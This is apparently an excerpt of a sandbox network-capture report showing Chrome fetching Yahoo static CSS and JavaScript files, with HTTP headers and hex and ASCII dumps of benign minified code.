                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1390INData Raw: 62 2e 70 75 73 68 28 64 29 7d 72 65 74 75 72 6e 20 62 7d 3b 6f 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 2e 73 74 61 63 6b 3d 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 7d 29 3b 61 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 45 72 72 6f 72 2e 70 72 6f 74 6f 74 79 70 65 29 3b 61 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 61 7d 3b 70 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 7b 7d 3b 62 2e 77 69 6e 6e 65 72 5f 71 69 64 3d 61 2e 67 65 74 45 73 63 61 70 65 64 51 65 6d 51 75 65 72 79 49 64 28 29 3b 62 2e 63 69 64 3d 5f 2e 74 28 61 2c 31 39 29 3b 62 2e 65 63 72 73 3d 5f 2e 74 28 61 2c 31 31 29 3b 72 65 74 75 72 6e 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: b.push(d)}return b};ob=function(a){a=a(function(b){b.stack=Error().stack});a.prototype=Object.create(Error.prototype);a.prototype.constructor=a};pb=function(a){var b={};b.winner_qid=a.getEscapedQemQueryId();b.cid=_.t(a,19);b.ecrs=_.t(a,11);return"https://
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1390INData Raw: 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 2e 73 75 62 61 72 72 61 79 28 63 2c 63 2b 3d 31 30 32 34 30 29 29 3b 62 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 63 3f 61 2e 73 75 62 61 72 72 61 79 28 63 29 3a 61 29 3b 72 65 74 75 72 6e 20 62 74 6f 61 28 62 29 7d 3b 41 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 7a 62 5b 61 5d 7c 7c 22 22 7d 3b 43 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 42 62 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 45 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 21 3d 3d 44 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 69 6c 6c 65 67 61 6c 20 65 78 74 65 72 6e 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Code.apply(null,a.subarray(c,c+=10240));b+=String.fromCharCode.apply(null,c?a.subarray(c):a);return btoa(b)};Ab=function(a){return zb[a]||""};Cb=function(a){return Bb&&a!=null&&a instanceof Uint8Array};Eb=function(a){if(a!==Db)throw Error("illegal externa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1390INData Raw: 3b 5f 2e 67 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 26 32 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 3b 69 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 5f 2e 68 63 3b 69 66 28 21 61 29 74 68 72 6f 77 20 45 72 72 6f 72 28 28 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 62 28 29 3a 62 29 7c 7c 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 6b 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 55 71 3d 21 30 3b 72 65 74 75 72 6e 20 61 7d 3b 6c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 63 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 30 7d 29 7d 3b 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6d 63 3b 72 65 74 75 72 6e 20 6b 63 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ;_.gc=function(a){if(a&2)throw Error();};ic=function(a){var b=_.hc;if(!a)throw Error((typeof b==="function"?b():b)||String(a));};kc=function(a){a.Uq=!0;return a};lc=function(){return kc(function(a){return a===0})};nc=function(){var a=mc;return kc(function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1390INData Raw: 36 3e 3e 3e 30 7d 3b 4b 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3c 30 29 7b 49 63 28 2d 61 29 3b 76 61 72 20 62 3d 5f 2e 79 28 4a 63 28 47 63 2c 48 63 29 29 3b 61 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 62 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 47 63 3d 61 3e 3e 3e 30 3b 48 63 3d 62 3e 3e 3e 30 7d 65 6c 73 65 20 49 63 28 61 29 7d 3b 4d 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3e 3e 3e 3d 30 3b 61 3e 3e 3e 3d 30 3b 69 66 28 62 3c 3d 32 30 39 37 31 35 31 29 76 61 72 20 63 3d 22 22 2b 28 34 32 39 34 39 36 37 32 39 36 2a 62 2b 61 29 3b 65 6c 73 65 20 4d 62 28 29 3f 63 3d 22 22 2b 28 42 69 67 49 6e 74 28 62 29 3c 3c 42 69 67 49 6e 74 28 33 32 29 7c 42 69 67 49 6e 74 28 61 29 29 3a 28 63 3d 28 61 3e 3e 3e 32 34 7c 62 3c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 6>>>0};Kc=function(a){if(a<0){Ic(-a);var b=_.y(Jc(Gc,Hc));a=b.next().value;b=b.next().value;Gc=a>>>0;Hc=b>>>0}else Ic(a)};Mc=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296*b+a);else Mb()?c=""+(BigInt(b)<<BigInt(32)|BigInt(a)):(c=(a>>>24|b<
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1390INData Raw: 28 61 29 7d 3b 53 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 62 6f 6f 6c 65 61 6e 22 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 45 78 70 65 63 74 65 64 20 62 6f 6f 6c 65 61 6e 20 62 75 74 20 67 6f 74 20 22 2b 52 63 28 61 29 2b 22 3a 20 22 2b 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 54 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 74 79 70 65 6f 66 20 61 3d 3d 3d 22 62 6f 6f 6c 65 61 6e 22 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 21 21 61 7d 3b 56 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 61 3b 73 77 69 74 63 68 28 62 29 7b 63 61 73 65 20 22 62 69 67 69 6e 74 22 3a 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (a)};Sc=function(a){if(typeof a!=="boolean")throw Error("Expected boolean but got "+Rc(a)+": "+a);return a};Tc=function(a){if(a==null||typeof a==="boolean")return a;if(typeof a==="number")return!!a};Vc=function(a){var b=typeof a;switch(b){case "bigint":re


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    144192.168.2.44990287.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC613OUTGET /aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: LuJ8ElFRs36LVqVMZydBwbJ97zDFM7qNvikvWaseSMQneqE5jbMdOWqCo+M/QnqGMRm+Vmf2mend5DzqIo0hTRjErnmA0bSMN8ntoGv1+tI=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: R7Z8WGDPJF107HD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 17 Sep 2024 08:17:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 26 Jan 2023 20:02:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "d156b541c028fe7d3167b101d15500f6"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: ID83SH3rHZwgttSuVe3SPvWHmQBqket7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 1155844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC180INData Raw: 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 2d 2d 77 68 69 74 65 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 23 61 74 6f 6d 69 63 20 2e 4f 76 5c 28 68 5c 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 23 61 74 6f 6d 69 63 20 2e 50 74 5c 28 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 6f 73 5c 28 72 5c 29 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: #atomic .Bgc\(--white\){background-color:#fff;background-color:var(--white)}#atomic .Ov\(h\){overflow:hidden}#atomic .Pt\(2px\){padding-top:2px}#atomic .Pos\(r\){position:relative}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    145192.168.2.44990487.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC611OUTGET /aaq/fp/css/react-wafer-games.GamesMini.atomic.ltr.be03a375386175922f163856820e511b.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC664INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: u0Moh+qdmkOcC+nevtZrIPHNjmLSe9XnawFKmdNLpfHlpOzT5JnONW5rf+ipbV7t7+SRpbrFODo=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 6XCCXCAGD0C5X9VA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Wed, 31 Jul 2024 09:55:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 25 Jul 2024 07:35:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "be03a375386175922f163856820e511b"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: gNLTi2NbsrRqDKpHVYD5splwIeUZXXjd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 8011
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 5297122
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 23 61 74 6f 6d 69 63 20 2e 41 69 5c 28 63 5c 29 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 2d 2d 6d 61 72 73 68 6d 61 6c 6c 6f 77 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 35 66 38 66 61 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 6d 61 72 73 68 6d 61 6c 6c 6f 77 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 63 5c 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 5c 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: #atomic .Ai\(c\){align-items:center}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bdc\(--marshmallow\){border-color:#f5f8fa;border-color:var(--marshmallow)}#atomic .Bdendc\(--hulk-pants\){border-right-colo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 61 64 69 75 73 3a 31 30 30 25 7d 23 61 74 6f 6d 69 63 20 2e 42 67 5c 28 5c 24 70 6c 61 79 47 61 6d 65 73 42 74 6e 47 72 61 64 69 65 6e 74 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 39 30 2e 34 33 64 65 67 2c 23 39 34 34 31 46 46 20 2d 32 2e 37 33 25 2c 23 37 46 34 37 46 46 20 36 31 2e 35 39 25 2c 23 36 37 32 34 46 35 20 39 39 2e 37 25 29 7d 2e 61 63 74 69 76 65 3e 2e 61 63 74 69 76 65 5c 3e 42 67 63 5c 28 2d 2d 62 61 74 63 61 76 65 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 74 63 61 76 65 29 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: adius:100%}#atomic .Bg\(\$playGamesBtnGradient\){background:linear-gradient(90.43deg,#9441FF -2.73%,#7F47FF 61.59%,#6724F5 99.7%)}.active>.active\>Bgc\(--batcave\){background-color:#232a31!important;background-color:var(--batcave)!important}#atomic .Bgc\(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 67 72 61 70 65 2d 6a 65 6c 6c 79 5c 29 5c 21 7b 63 6f 6c 6f 72 3a 23 36 30 30 31 64 32 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 72 61 70 65 2d 6a 65 6c 6c 79 29 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 61 62 41 63 74 69 76 65 20 2e 74 61 62 41 63 74 69 76 65 5f 43 5c 28 2d 2d 69 6e 6b 77 65 6c 6c 5c 29 5c 21 7b 63 6f 6c 6f 72 3a 23 31 64 32 32 32 38 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 69 6e 6b 77 65 6c 6c 29 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 43 75 72 5c 28 70 5c 29 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 44 5c 28 62 5c 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 61 74 6f 6d 69 63 20 2e 44 5c 28 66 5c 29 7b 64 69 73 70 6c 61 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: grape-jelly\)\!{color:#6001d2!important;color:var(--grape-jelly)!important}.tabActive .tabActive_C\(--inkwell\)\!{color:#1d2228!important;color:var(--inkwell)!important}#atomic .Cur\(p\){cursor:pointer}#atomic .D\(b\){display:block}#atomic .D\(f\){display
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 31 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 38 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 61 63 74 69 76 65 3e 2e 61 63 74 69 76 65 5c 3e 48 5c 28 38 70 78 5c 29 7b 68 65 69 67 68 74 3a 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 31 30 30 5c 25 5c 29 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 31 32 70 78 5c 29 7b 68 65 69 67 68 74 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 31 36 70 78 5c 29 7b 68 65 69 67 68 74 3a 31 36 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 32 35 5c 25 5c 29 7b 68 65 69 67 68 74 3a 32 35 25 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 32 39 30 70 78 5c 29 7b 68 65 69 67 68 74 3a 32 39 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 14px}#atomic .Fz\(18px\){font-size:18px}.active>.active\>H\(8px\){height:8px!important}#atomic .H\(100\%\){height:100%}#atomic .H\(12px\){height:12px}#atomic .H\(16px\){height:16px}#atomic .H\(25\%\){height:25%}#atomic .H\(290px\){height:290px}#atomic .H\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 31 34 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 32 34 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 32 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 33 32 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 34 30 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 35 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 7d 23 61 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: bottom:0!important}#atomic .Mb\(14px\){margin-bottom:14px}#atomic .Mb\(24px\){margin-bottom:24px}#atomic .Mb\(2px\){margin-bottom:2px}#atomic .Mb\(32px\){margin-bottom:32px}#atomic .Mb\(40px\){margin-bottom:40px}#atomic .Mstart\(5px\){margin-left:5px}#ato
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 74 69 76 65 5f 50 62 5c 28 36 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 36 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 50 65 5c 28 6e 5c 29 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 50 6f 73 5c 28 61 5c 29 2c 2e 53 74 72 65 74 63 68 65 64 42 6f 78 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 61 74 6f 6d 69 63 20 2e 50 6f 73 5c 28 72 5c 29 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 61 74 6f 6d 69 63 20 2e 54 61 5c 28 63 5c 29 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 54 61 5c 28 65 5c 29 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 65 6e 64 7d 23 61 74 6f 6d 69 63 20 2e 54 61 5c 28 73 5c 29 7b 74 65 78 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tive_Pb\(6px\){padding-bottom:6px!important}#atomic .Pe\(n\){pointer-events:none}#atomic .Pos\(a\),.StretchedBox{position:absolute}#atomic .Pos\(r\){position:relative}#atomic .Ta\(c\){text-align:center}#atomic .Ta\(e\){text-align:end}#atomic .Ta\(s\){text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC211INData Raw: 73 73 2a 3d 4c 69 6e 65 43 6c 61 6d 70 5d 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 7d 61 5b 63 6c 61 73 73 2a 3d 4c 69 6e 65 43 6c 61 6d 70 5d 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 7d 2e 4c 69 6e 65 43 6c 61 6d 70 5c 28 31 5c 2c 31 5c 2e 35 72 65 6d 5c 29 7b 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 2d 63 6c 61 6d 70 3a 31 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 2e 53 74 72 65 74 63 68 65 64 42 6f 78 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ss*=LineClamp]{display:-webkit-box;-webkit-box-orient:vertical}a[class*=LineClamp]{display:-webkit-box}.LineClamp\(1\,1\.5rem\){-webkit-line-clamp:1;max-height:1.5rem}.StretchedBox{bottom:0;left:0;right:0;top:0}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    146192.168.2.44990387.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC597OUTGET /aaq/fp/css/react-wafer-games.games-mini.cdd5050ba6288df47182412e30e482a4.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
